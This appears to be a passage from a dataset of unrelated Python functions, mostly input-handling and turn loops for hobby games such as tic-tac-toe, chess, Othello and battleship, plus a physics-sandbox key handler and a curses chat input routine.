draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Center\")\n\n elif key == \"%\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Sticky\")\n\n elif key == \"£\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Enlarger\")\n\n\n elif 
key == \"$\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Shrinker\")\n\n\n elif key == \"0\" and cur_key_type == 0:\n # pause physics\n phys.force_draw_all = not phys.force_draw_all\n options = {\"Draw All\": SelectType.null, \"Draw Set\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n\n\n elif key == \"o\" and cur_key_type == 0:\n # pause physics\n draw.reset()\n phys.pause = not phys.pause\n msg.set_message(\"Pause\" + (\" On\" if phys.pause is True else \" Off\"))\n cur_key = \"o\"\n\n elif key == \"*\" and cur_key_type == 0:\n # PICKLE BOARD\n name, blurb = save_gui()\n if not name is None:\n pickler(timer, phys, draw, board, msg, name, blurb)\n msg.set_message(\"State Saved\")\n cur_key = \"*\"\n draw.reset()\n\n elif key == \"-\":\n # LOAD BOARD\n\n timer, phys, draw, board, msg = load_gui(timer, phys, draw, board, msg, persistant=False)\n config = phys.config\n\n elif key == \"5\" and cur_key_type == 0:\n\n load_options()\n phys.change_config(board=board)\n\n elif key == \"6\" and cur_key_type == 0:\n\n board, phys, msg = update_background(board, phys, msg)\n\n\n elif key == \"j\" and cur_key_type == 0:\n # draw joints\n draw.reset()\n options = {\"Merge Blocks\": SelectType.select,\n \"Distance Joint\": SelectType.straight_join, \"Rope Joint\": SelectType.straight_join,\n \"Prismatic Joint\": SelectType.straight_join,\n \"Electric\": SelectType.line_join,\n \"Chain\": SelectType.line_join2,\n \"Weld Joint\": SelectType.straight_join, \"Wheel Joint\": SelectType.circle,\n \"Rotation Joint\": SelectType.rotation_select, \"Pulley\": SelectType.d_straight_join}\n\n cur_key = msg.auto_set(options, key, force)\n\n\n\n elif key == \"tab\":\n # Tab key press, this switches to move mode\n if cur_key_type == 0:\n cur_key_type = 1\n msg.set_message(\"Drawing Mode Enabled\")\n draw.reset()\n else:\n cur_key_type = 0\n msg.set_message(\"Create Mode Enabled\")\n draw.reset()\n\n\n # Drawing mode buttons\n\n elif key == \"`\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Change Keys\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"1\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Screen Move\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"2\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Center Clicked\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"]\" and cur_key_type == 1:\n # draw polygon\n draw.reset()\n options = {\"Fire Bullet\": SelectType.bullet_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"[\" and cur_key_type == 1:\n # draw polygon\n draw.reset()\n options = {\"Choose Player\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"3\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Motor Forwards\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"4\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Motor Backwards\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"9\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n cur_key = key + str(SelectType.vector_direction.value)\n msg.set_message(\"Force\")\n\n elif key == \"0\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Relative 
Force\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"5\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Rotate CCW\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"6\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Rotate CW\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"7\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n cur_key = key + str(SelectType.vector_direction.value)\n msg.set_message(\"Impulse\")\n\n\n elif key == \"8\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Relative Impulse\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"!\" and cur_key_type == 1:\n \"\"\"\n Used to attach an relative impulse to a block\n \"\"\"\n board.translation = np.array([0, 0])\n\n # do move keypresses:\n if cur_key_type == 1:\n phys.do_keypress(key)\n\n return cur_key_type, cur_key, draw, phys, msg, timer, board", "def play(self):\n for step_i in range(self.max_step):\n player_id = step_i & 1\n player = self.players[player_id]\n action = player.nxt_move()\n if isinstance(player, mcts.MCTSPlayer) and player.value_net.loggable:\n print(f'Player{player_id}: Action: {action}')\n if not self.is_valid_action(action):\n # because now just consider 2 players\n print(f\"Player: {player_id}, Action: {action} Did Not choose a valid action!\")\n self.board[action // self.w][action % self.w] = player_id\n self.winner = 1 - player_id\n else:\n self.board[action // self.w][action % self.w] = player_id\n self.winner = self.k0()\n self.players[1 - player_id].other_nxt_move(action)\n if self.winner != -1:\n break\n print(f'Winner: {self.winner}')\n for player_id in range(len(self.players)):\n self.players[player_id].game_ended()", "def user_input(self):\n\n # Above, we set the timeout of getch() on entryscreen to 500ms. That means\n # that the invalid character (-1) is returned every 500 ms if the user\n # enters nothing, and our validator is called. We take this opportunity to\n # relese the curses lock so any other threads (e.g. the message handling\n # thread) have a chance to update the screen. Additionally, we call\n # update() so that any other changes are picked up. 
We raise _StoppedError\n # to get out of the surrounding loop in edit() so that we can exit this\n # function cleanly and without hijacking any other exceptions (such as\n # KeyboardInterrupt).\n\n class _StoppedError(Exception):\n pass\n\n def validator(ch):\n if ch == curses.KEY_RESIZE:\n self.chatscreen.clear()\n (y, x) = self.global_screen.getmaxyx()\n curses.resizeterm(y, x)\n self.chatscreen.resize(y-Chat.CHATBOX_SIZE, x)\n self.entryscreen.mvwin(y-Chat.CHATBOX_SIZE, 0)\n self.update()\n return None\n try:\n self.curses_lock.release()\n if not self.running:\n raise _StoppedError\n self.update() # has anything changed?\n if ch < 0:\n return None\n return ch\n finally:\n self.curses_lock.acquire()\n\n try:\n self.curses_lock.acquire()\n cmd = self.textpad.edit(validator)\n self.entryscreen.clear()\n except _StoppedError:\n return ''\n finally:\n self.curses_lock.release()\n\n # strip the newlines out of the middle of the words\n cmd = string.replace(cmd, '\\n', '')\n\n # remove unprintable characters\n cmd = (''.join(c if c in string.printable else '' for c in cmd)).strip()\n\n # process commands if necessary\n if cmd.startswith('/'):\n words = cmd.split()\n cmdname = words[0][1:]\n args = words[1:]\n\n if cmdname in self.commands:\n try:\n self.commands[cmdname](*args)\n except CommandError as e:\n self.message('System:', 'Problem executing command: ' + str(e))\n except TypeError as e:\n self.message('System:', str(e))\n else:\n self.message('System:', 'Unknown command: '+cmdname)\n else:\n # it's not a cmd so it must be a message to send\n self.q.put(cmd)\n self.update()", "def move(self,board,n,display):\n\n\t\tmove = False\n\t\tgoodInput = False\n\t\tn = 0\n\n\t\twhile not goodInput:\n\t\t\tpygame.time.wait(10)\n\t\t\tdisplay.displayBoard()\n\t\t\tmove = display.getMove()\n\n\t\t\tif move == \"End Preset\":\n\t\t\t\treturn move\n\n\t\t\tif move and tuple(move) in board.openPoints():\n\t\t\t\tgoodInput = True\n\t\t\telif move:\n\t\t\t\tprint \"Bad input, try again!\"\n\n\t\t\tn += 1\n\n\t\treturn move", "def host_game(self):\n current_side = \"X\"\n while ( (not self.win_for(\"X\"))\n and (not self.win_for(\"O\"))\n and (not self.is_full())):\n print()\n print(self)\n print()\n move = Board.INVALID_MOVE\n while not self.allows_move(move):\n move = int(input(current_side + \"'s move: \"))\n self.add_move(move, current_side)\n if current_side == \"X\":\n current_side = \"O\"\n else:\n current_side = \"X\"\n\n if self.win_for(\"X\"):\n print(\"X wins --- congratulations!\\n\")\n elif self.win_for(\"O\"):\n print(\"O wins --- congratulations!\\n\")\n else:\n print(\"Tied game!\\n\")\n\n print()\n print(self)", "def human_expert(_obs):\n\n while True:\n env.render()\n print_play_keys(env.action_str)\n time.sleep(0.2)\n key_pressed = keyboard.read_key()\n # return index of action if valid key is pressed\n if key_pressed:\n if key_pressed in KEY_ACTION_DICT:\n return KEY_ACTION_DICT[key_pressed]\n elif key_pressed == \"esc\":\n print(\"You pressed esc, exiting!!\")\n break\n else:\n print(\"You pressed wrong key. 
Press Esc key to exit, OR:\")", "def input(self, event):\n # If the window is quit.\n if event.type == pygame.QUIT:\n # Exit the game.\n return 0\n\n # If escape is hit.\n if (\n event.type == pygame.QUIT\n or event.type == pygame.KEYDOWN\n and event.key == pygame.K_ESCAPE\n ):\n # Return to the menu.\n return 1\n\n # If SPACE is hit.\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n # If the player can move\n if self.background1.getMoving():\n # Jump sound effect.\n self.jumpSound.play()\n # Make the player jump.\n self.player.jump()\n\n # If game end.\n if self.gameEnd:\n # If the exit button is pressed.\n if self.exitButton.input(event):\n return 1\n # If the exit button is pressed.\n if self.retryButton.input(event):\n self.reset()\n\n # Continue the game.\n return 2", "def main():\n \n is_white_move = True\n board = initial_state()\n print_board(board)\n \n while True:\n if is_white_move == True:\n print()\n result = str(input(\"White's move: \"))\n else:\n print()\n result = str(input(\"Black's move: \"))\n\n if result == 'h' or result == 'H':\n print(HELP_MESSAGE)\n print_board(board)\n elif result == 'q' or result == 'Q':\n confirm_quit = str(input(\"Are you sure you want to quit? \"))\n if confirm_quit == 'y' or confirm_quit == \"Y\":\n break\n else:\n print_board(board) \n\n else:\n if valid_move_format(result) == False:\n print('Invalid move')\n print()\n print_board(board)\n else:\n move = process_move(result)\n if is_move_valid(move, board, is_white_move): \n board = update_board(board, move)\n print_board(board)\n is_white_move = not is_white_move\n if check_game_over(board, is_white_move):\n break\n else:\n print('Invalid move')\n print()\n print_board(board)", "def receive_play(current_player, marks, board_state):\n valid_answer = False\n while not valid_answer:\n current_play = input(\n \"{}, choose a square (1-9) to place your {}. 
\".format(current_player, marks[current_player]))\n valid_answer = check_inputs(filter_occupied(board_state), current_play)\n if valid_answer:\n current_play = int(current_play)\n board_state[current_play - 1] = marks[current_player]\n return board_state", "def play(state, player_turn, human_marker, depth):\n alpha = -10\n beta = 10\n while True:\n draw_board(state)\n marker = is_terminal(state)\n\n if marker is not None:\n if marker == 'X':\n print(\"The winner is 'X'!\")\n elif marker == 'O':\n print(\"The winner is 'O'!\")\n else:\n print(\"The game ended in a tie!\")\n return\n\n # Presumably AI's turn.\n if player_turn == 0:\n ai_marker = 'X' if human_marker == 'O' else 'O'\n if ai_marker == 'X':\n value, move = max_value(state, ai_marker, depth, alpha, beta)[:2]\n else:\n value, move = min_value(state, ai_marker, depth, alpha, beta)[:2]\n depth = depth + 1\n state[move[0]][move[1]] = ai_marker\n player_turn = 1\n\n # Presumably human player's turn.\n else:\n move = list(map(int, input('Enter your move: ').strip('[]').split(',')))\n while not is_valid_move(state, move):\n move = list(map(int, input('Enter your move: ').strip('[]').split(',')))\n\n state[move[0]-1][move[1]-1] = human_marker\n depth = depth + 1\n player_turn = 0", "def next_turn(self): \n if (self.moves):\n self.board = self.select_move() \n self.moves = []\n self.roll = self.roll_dice()\n self.player = not self.player\n self.generate_valid_moves()", "def run_game():\n mainBoard = get_new_board()\n resetBoard(mainBoard)\n showHints = False\n\n turn = random.choice(['computer', 'player'])\n\n # Draw the starting board and ask the player what color they want.\n draw_board(mainBoard)\n\n playerTile, computer_tile = enter_player_tile()\n # Make the Surface and Rect objects for the \"New Game\" and \"Hints\" buttons\n\n newGameSurf = FONT.render('New Game', True, TEXTCOLOR, TEXTBGCOLOR2)\n newGameRect = newGameSurf.get_rect()\n newGameRect.topright = (WINDOWWIDTH - 8, 10)\n\n hintsSurf = FONT.render('Hints', True, TEXTCOLOR, TEXTBGCOLOR2)\n hintsRect = hintsSurf.get_rect()\n hintsRect.topright = (WINDOWWIDTH - 8, 40)\n\n while True: # main game loop\n # Keep looping for player and computer's turns.\n if turn == 'player':\n # Player's turn:\n if get_valid_moves(mainBoard, playerTile) == []:\n # If it's the player's turn but they\n # can't move, then end the game.\n break\n\n movexy = None\n\n while movexy == None:\n # Keep looping until the player clicks on a valid space.\n # Determine which board data structure to use for display.\n if showHints:\n boardToDraw = get_board_with_valid_moves(mainBoard, playerTile)\n else:\n boardToDraw = mainBoard\n\n check_for_quit()\n for event in pygame.event.get(): # event handling loop\n if event.type == MOUSEBUTTONUP:\n # Handle mouse click events\n mousex, mousey = event.pos\n if newGameRect.collide_point((mousex, mousey)):\n # Start a new game\n return True\n elif hintsRect.collide_point((mousex, mousey)):\n # Toggle hints mode\n showHints = not showHints\n # movexy is set to a two-item tuple XY coordinate, or None value\n movexy = get_space_clicked(mousex, mousey)\n\n if movexy != None and not isValidMove(mainBoard, playerTile, movexy[0], movexy[1]):\n movexy = None\n\n # Draw the game board.\n draw_board(boardToDraw)\n draw_info(boardToDraw, playerTile, computer_tile, turn)\n\n # Draw the \"New Game\" and \"Hints\" buttons.\n DISPLAYSURF.blit(newGameSurf, newGameRect)\n DISPLAYSURF.blit(hintsSurf, hintsRect)\n\n MAINCLOCK.tick(FPS)\n pygame.display.update()\n\n # Make the move and end 
the turn.\n make_move(mainBoard, playerTile, movexy[0], movexy[1], True)\n if get_valid_moves(mainBoard, computer_tile) != []:\n # Only set for the computer's turn if it can make a move.\n turn = 'computer'\n else:\n # Computer's turn:\n if get_valid_moves(mainBoard, computer_tile) == []:\n # If it was set to be the computer's turn but\n # they can't move, then end the game.\n break\n\n # Draw the board.\n draw_board(mainBoard)\n draw_info(mainBoard, playerTile, computer_tile, turn)\n\n # Draw the \"New Game\" and \"Hints\" buttons.\n DISPLAYSURF.blit(newGameSurf, newGameRect)\n DISPLAYSURF.blit(hintsSurf, hintsRect)\n\n # Make it look like the computer is thinking by pausing a bit.\n pauseUntil = time.time() + random.randint(5, 15) * 0.1\n\n while time.time() < pauseUntil:\n pygame.display.update()\n\n # Make the move and end the turn.\n x, y = get_computer_move(mainBoard, computer_tile)\n make_move(mainBoard, computer_tile, x, y, True)\n\n if get_valid_moves(mainBoard, playerTile) != []:\n # Only set for the player's turn if they can make a move.\n turn = 'player'\n\n # Display the final score.\n draw_board(mainBoard)\n scores = get_score_of_board(mainBoard)\n # Determine the text of the message to display.\n\n if scores[playerTile] > scores[computer_tile]:\n text = 'You beat the computer by %s points! Congratulations!' % \\\n (scores[playerTile] - scores[computer_tile])\n elif scores[playerTile] < scores[computer_tile]:\n text = 'You lost. The computer beat you by %s points.' % \\\n (scores[computer_tile] - scores[playerTile])\n else:\n text = 'The game was a tie!'\n\n textSurf = FONT.render(text, True, TEXTCOLOR, TEXTBGCOLOR1)\n textRect = textSurf.get_rect()\n textRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2))\n DISPLAYSURF.blit(textSurf, textRect)\n\n # Display the \"Play again?\" text with Yes and No buttons.\n text2Surf = BIGFONT.render('Play again?', True, TEXTCOLOR, TEXTBGCOLOR1)\n text2Rect = text2Surf.get_rect()\n text2Rect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2) + 50)\n\n # Make \"Yes\" button.\n yesSurf = BIGFONT.render('Yes', True, TEXTCOLOR, TEXTBGCOLOR1)\n yesRect = yesSurf.get_rect()\n yesRect.center = (int(WINDOWWIDTH / 2) - 60, int(WINDOWHEIGHT / 2) + 90)\n\n # Make \"No\" button.\n noSurf = BIGFONT.render('No', True, TEXTCOLOR, TEXTBGCOLOR1)\n noRect = noSurf.get_rect()\n noRect.center = (int(WINDOWWIDTH / 2) + 60, int(WINDOWHEIGHT / 2) + 90)\n\n while True:\n # Process events until the user clicks on Yes or No.\n check_for_quit()\n\n for event in pygame.event.get(): # event handling loop\n if event.type == MOUSEBUTTONUP:\n mousex, mousey = event.pos\n\n if yesRect.collide_point((mousex, mousey)):\n return True\n\n elif noRect.collide_point((mousex, mousey)):\n return False\n\n DISPLAYSURF.blit(textSurf, textRect)\n DISPLAYSURF.blit(text2Surf, text2Rect)\n DISPLAYSURF.blit(yesSurf, yesRect)\n DISPLAYSURF.blit(noSurf, noRect)\n\n pygame.display.update()\n MAINCLOCK.tick(FPS)", "def human(gstate: TicTacToe, *args):\n return input_with_validation(\"Please enter move.\", list(gstate.next_moves.keys()))", "def play_game(word_list):\n hand = None\n while True:\n game_type = raw_input('Please choose from the following: n(new random hand), r(last hand) or e(exit the game):')\n if game_type == 'n':\n hand = deal_hand(HAND_SIZE)\n player_type = raw_input('Please choose from the following: u(user can play) or c(computer can play):')\n if player_type == 'u':\n play_hand(hand, word_list)\n elif player_type == 'c':\n comp_play_hand(hand, word_list)\n else: 
\n player_type = raw_input('Incorrect input. Please choose from the following: u(user can play) or c(computer can play):')\n elif game_type == 'r' and hand == None:\n print 'Incorrect input. Please first choose n.'\n elif game_type == 'r':\n player_type = raw_input('Please choose from the following: u(user can play) or c(computer can play):')\n if player_type == 'u':\n play_hand(hand, word_list)\n elif player_type == 'c':\n comp_play_hand(hand, word_list)\n else: \n player_type = raw_input('Incorrect input. Please choose from the following: u(user can play) or c(computer can play):') \n elif game_type == 'e':\n print \"Exited the game.\"\n break\n else: \n print 'Incorrect input.'", "def advance(self, board):", "def play_turn(self, player):\n input('Play turn...')\n print(f'{player.name} to play...\\n')\n \n if isinstance(player, ComputerPlayer):\n print('Thinking...')\n time.sleep(1)\n row, col = player.algorithm(self.board)\n self.board.play(row, col, player.token) # algorithms index from (0,0) - so adjust this to (1,1) etc \n else:\n print(self.board)\n while True:\n usr_input = input(f'{player.name}, enter a move: ')\n \n if usr_input.lower() == 'exit':\n print(f'{player.name} exited!')\n self.exit_flag = True\n return\n\n if usr_input.lower() == 'skip':\n print(f'{player.name} has skipped their go!')\n return\n\n row, col = [int(i) for i in usr_input.split(' ')]\n try:\n self.board.play(row - 1, col - 1, player.token) # index top-left corner as (1,1) in player input, vs (0,0) everywhere else\n except IndexError as e:\n print(str(e), 'Play a different position.')\n else:\n break\n print(f'{player.name} played: ({row + 1}, {col + 1})\\n')\n print(self.board)", "def next_action():\n while True:\n next = input('Enter Q to quit programme. M to return to main menu \\n')\n if next.lower() == 'q':\n logout()\n elif next.lower() == 'm':\n hr_main()\n is_invalid()", "def get_input(self):\n result = None\n\n try:\n while True:\n result = self.console.read_for_condition(prompt=\">>> \", condition=self.is_valid_input)\n\n if result is not None:\n break\n except KeyboardInterrupt:\n quit()\n\n # run command for next condition\n self.game_branch[result]()", "def _handleInput(self):\n\n Game.Player.running(Game.ControlState[Game.MoveRight], not (Game.ControlState[Game.MoveRight] == Game.ControlState[Game.MoveLeft]))\n Game.Player.jumping(Game.ControlState[Game.Jump])\n Game.Player.flying(Game.ControlState[Game.Fly])\n Game.Player.firing(Game.ControlState[Game.Fire])", "def control(self):\n while not (self.game_over() or self.quit):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r:\n self.play()\n elif event.key == pygame.K_m:\n self.__init__()\n elif event.key == pygame.K_LEFT and len(self.sequence)>=2:\n self.sequence.pop()\n self.board = self.sequence.pop()\n self.draw()\n elif event.key == pygame.K_1:\n self.tip(1)\n elif event.key == pygame.K_2:\n self.tip(2)\n elif event.key == pygame.K_3:\n self.tip(3)\n elif event.key == pygame.K_4:\n self.tip(4)\n elif event.key == pygame.K_5:\n self.tip(5)\n \n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n ## if mouse is pressed get position of cursor ##\n pos = pygame.mouse.get_pos()\n ## check if cursor is on button ##\n for i in range(len(self.buttons)):\n for j in range(len(self.buttons[i])):\n if self.buttons[i][j].collidepoint(pos):\n if self.selected == None:\n self.selected = [i,j]\n elif self.selected == [i,j]:\n self.selected 
= None\n elif self.board[self.selected[0]][self.selected[1]]==0:\n self.selected = [i,j]\n else:\n if self.move(i,j):\n self.selected = None\n self.draw()\n return True\n else:\n self.selected = None\n self.draw()\n return False\n self.draw()\n return False", "def main():\r\n clean()\r\n h_choice = '2' # \r\n c_choice = '1' # \r\n first = '' # if human is the first\r\n\r\n # Human may starts first\r\n clean()\r\n while first != 'Y' and first != 'N':\r\n try:\r\n print(\" $$\\ $$\\ $$$$$$\\ $$$$$$$\\ $$$$$$$\\ $$$$$$$$\\ $$$$$$$\\ $$$$$$\\ \") \r\n print(\" $$ | $$ |$$ __$$\\ $$ __$$\\ $$ __$$\\ $$ _____|$$ __$$\\ $$ __$$\\ \")\r\n print(\" $$ | $$ |$$ / $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ / \\__|\")\r\n print(\" $$$$$$$$ |$$ | $$ |$$$$$$$ |$$$$$$$ |$$$$$\\ $$$$$$$ |\\$$$$$$\\ \")\r\n print(\" $$ __$$ |$$ | $$ |$$ ____/ $$ ____/ $$ __| $$ __$$< \\____$$\\ \")\r\n print(\" $$ | $$ |$$ | $$ |$$ | $$ | $$ | $$ | $$ |$$\\ $$ |\")\r\n print(\" $$ | $$ | $$$$$$ |$$ | $$ | $$$$$$$$\\ $$ | $$ |\\$$$$$$ |\")\r\n print(\" \\__| \\__| \\______/ \\__| \\__| \\________|\\__| \\__| \\______/ \") \r\n \r\n first = input('First to start?[y/n]: ').upper()\r\n except (EOFError, KeyboardInterrupt):\r\n print('Bye')\r\n exit()\r\n except (KeyError, ValueError):\r\n print('Bad choice')\r\n\r\n # Main loop of this game\r\n while len(empty_cells(board)) > 0 and not game_over(board):\r\n \r\n if first == 'N':\r\n print(\"Step\")\r\n xi = int (input(\"Initial row COMP(0-9): \"))\r\n yi = int (input(\"Initial column COMP(0-9): \"))\r\n ai_turn(c_choice, h_choice, xi, yi)\r\n first = ''\r\n render(board, c_choice, h_choice)\r\n print(\"Hope\")\r\n xi = int (input(\"Initial row HUMAN(0-9): \"))\r\n yi = int (input(\"Initial column HUMAN(0-9): \"))\r\n human_turn(c_choice, h_choice,xi,yi)\r\n render(board, c_choice, h_choice)\r\n xi = int (input(\"Initial row COMP(0-9): \"))\r\n yi = int (input(\"Initial column COMP(0-9): \"))\r\n ai_turn(c_choice, h_choice, xi, yi)\r\n\r\n # Game over message\r\n if wins(board, HUMAN):\r\n clean()\r\n print(f'Human turn [{h_choice}]')\r\n render(board, c_choice, h_choice)\r\n print('YOU WIN!')\r\n elif wins(board, COMP):\r\n clean()\r\n print(f'Computer turn [{c_choice}]')\r\n render(board, c_choice, h_choice)\r\n print('YOU LOSE!')\r\n else:\r\n clean()\r\n render(board, c_choice, h_choice)\r\n print('DRAW!')\r\n\r\n exit()", "def prompt_player(self):\n board = self.draw_board()\n print board\n self.player_moves(self.board_values)", "def play_game() -> None:\n board = tuple(tuple(0 for _ in range(i, i + 16))\n for i in range(0, 64, 16))\n state = GameState(board, 1)\n while state.util is None:\n # human move\n print(state.display)\n state = state.traverse(int(input(\"Move: \")))\n if state.util is not None:\n break\n # computer move\n find_best_move(state)\n move = (state.selected if state.selected != -1\n else random.choice(state.moves))\n state = state.traverse(move)\n print(state.display)\n if state.util == 0:\n print(\"Tie Game\")\n else:\n print(f\"Player {state.util} Wins!\")", "def run_game(self):\n n = 1\n while self._run:\n # lock Framerate\n self._clock.tick(self._fps)\n # Process Input\n self._map.drawmap(self._screen)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self._run = False\n if (event.type == pygame.KEYDOWN):\n print(\"KeyDown\")\n if (event.key == pygame.K_SPACE):\n print(\"KeySpace\")\n self.move_to_next_turn()\n\n \"\"\"\n All Test Code\n \"\"\"\n if (self._player_turn == 1 and n == 1):\n self._screen.blit(self._core_deck.draw_deck(), 
(105, 130))\n for player in self._player_list:\n self._screen.blit(self._core_deck.draw_deck(), (105, 130))\n for player in self._player_list:\n print(player._name)\n player.show_hand()\n print(\"Deck: \\n\")\n self._core_deck.print_deck()\n print(self._player_list[0]._name)\n print(\"Playing a card...\")\n self._core_deck.go_to_graveyard(self._player_list[0].play_card(1))\n print(\"The hand:\")\n self._player_list[0].show_hand()\n print(\"Main Deck:\")\n self._core_deck.print_deck()\n print(\"Graveyard:\")\n self._core_deck.show_graveyard()\n for player in self._player_list:\n print(player._name)\n player.print_units()\n n = 2\n pygame.display.update()", "def start():\n boards = [Board(board_size, number_of_game_pieces, 1), Board(board_size, number_of_game_pieces, 2)]\n gameover = False\n quitgame = False\n i = 1\n while not gameover:\n coords_accepted = False\n while not coords_accepted:\n inp = input(\n f\"Player {boards[(i + 1) % 2].player_id}, what is the coordinate you're targeting (row,column,layer)?\")\n if inp == \"show\":\n print(boards[(i + 1) % 2])\n continue\n elif inp == \"quit\":\n quitgame = True\n break\n elif boards[i].test_coords_valid(inp):\n coords_accepted = True\n else:\n print(\"Invalid coordinates. \")\n if quitgame:\n print(\"Quitting game\")\n break\n x, y, z = eval(inp)\n gameover = boards[i].strike(x, y, z)\n if gameover:\n print(f\"Game over, player #{boards[(i + 1) % 2].player_id} won!\")\n i = (i + 1) % 2", "def game():\n board = create_board(8)\n character = create_character()\n reached_goal = False\n while not reached_goal:\n display_position(board, character)\n direction = input(\"Please enter a key in 'wasd' to move that direction. You cannot move pass the edge of the \"\n \"map.\")\n if validate_move(board, character, direction):\n move_character(direction, character)\n reached_goal = is_win(character, board)\n else:\n print(\"Please select a valid input. Enter a wasd key and do not move past the walls!\")\n display_position(board, character)\n print(\"You win!\")", "def main():\n # each square in the board is assigned a label (1a-3c)\n board_values = deepcopy(c.INITIAL_BOARD_VALUES)\n\n print_welcome_message(board_values)\n\n winner = None\n current_player = None\n while winner is None:\n # current player is either \"X\" or \"O\"\n current_player = get_next_player(current_player)\n\n # ask the current player to choose a square\n chosen_square = get_next_move(current_player, board_values)\n\n # update the board, show it, and check for a winner or a full board\n board_values[chosen_square] = current_player\n print_board(board_values)\n winner = get_winner(board_values)\n\n print(get_final_message(winner))", "def we_move(self):\n if self.player_squares.__len__() == 0:\n print \"This is the first move!\"\n self.record_move(self.our_squares, self.our_symbol, 5)\n self.finish_move(self.our_symbol, self.our_squares)\n else:\n print \"This is not the first move.\"\n # See where we should move next\n # Take square 5 if it's open\n if self.is_square_free(5):\n print \"Taking square 5.\"\n self.record_move(self.our_squares, self.our_symbol, 5)\n self.finish_move(self.our_symbol, self.our_squares)\n else:\n # See if the player is about to win\n print \"Square 5 is gone. 
Picking another.\"\n for win in TicTacToe.wins:\n print \"Testing winning combos for player.\"\n win_count = 0\n win_matches = []\n win_misses = []\n for i in win:\n if i in self.player_squares:\n print \"square %d is in win\" % i\n win_count += 1\n win_matches.append(i)\n elif i not in self.our_squares:\n win_misses.append(i)\n print \"win_count is %s\" % win_count\n if win_count == 2 and win_misses.__len__() > 0:\n print \"Uh-oh! Looks like the player might win soon.\"\n print \"win is %s\" % win\n print \"win_matches is %s\" % win_matches\n print \"win_misses is %s\" % win_misses[0]\n self.record_move(self.our_squares, self.our_symbol, win_misses[0])\n self.finish_move(self.our_symbol, self.our_squares)\n return\n # Try to block based on the player's last move\n if self.players_last_move == 1:\n if self.is_square_free(2):\n self.record_move(self.our_squares, self.our_symbol, 2)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(4):\n self.record_move(self.our_squares, self.our_symbol, 4)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(3):\n self.record_move(self.our_squares, self.our_symbol, 3)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(7):\n self.record_move(self.our_squares, self.our_symbol, 7)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.players_last_move == 3:\n if self.is_square_free(2):\n self.record_move(self.our_squares, self.our_symbol, 2)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(6):\n self.record_move(self.our_squares, self.our_symbol, 6)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(9):\n self.record_move(self.our_squares, self.our_symbol, 9)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(1):\n self.record_move(self.our_squares, self.our_symbol, 1)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.players_last_move == 9:\n if self.is_square_free(6):\n self.record_move(self.our_squares, self.our_symbol, 6)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(8):\n self.record_move(self.our_squares, self.our_symbol, 8)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(3):\n self.record_move(self.our_squares, self.our_symbol, 3)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(7):\n self.record_move(self.our_squares, self.our_symbol, 7)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.players_last_move == 7:\n if self.is_square_free(8):\n self.record_move(self.our_squares, self.our_symbol, 8)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(4):\n self.record_move(self.our_squares, self.our_symbol, 4)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(9):\n self.record_move(self.our_squares, self.our_symbol, 9)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(1):\n self.record_move(self.our_squares, self.our_symbol, 1)\n self.finish_move(self.our_symbol, self.our_squares)\n # No fancy logic here!\n elif self.is_square_free(1):\n self.record_move(self.our_squares, self.our_symbol, 1)\n 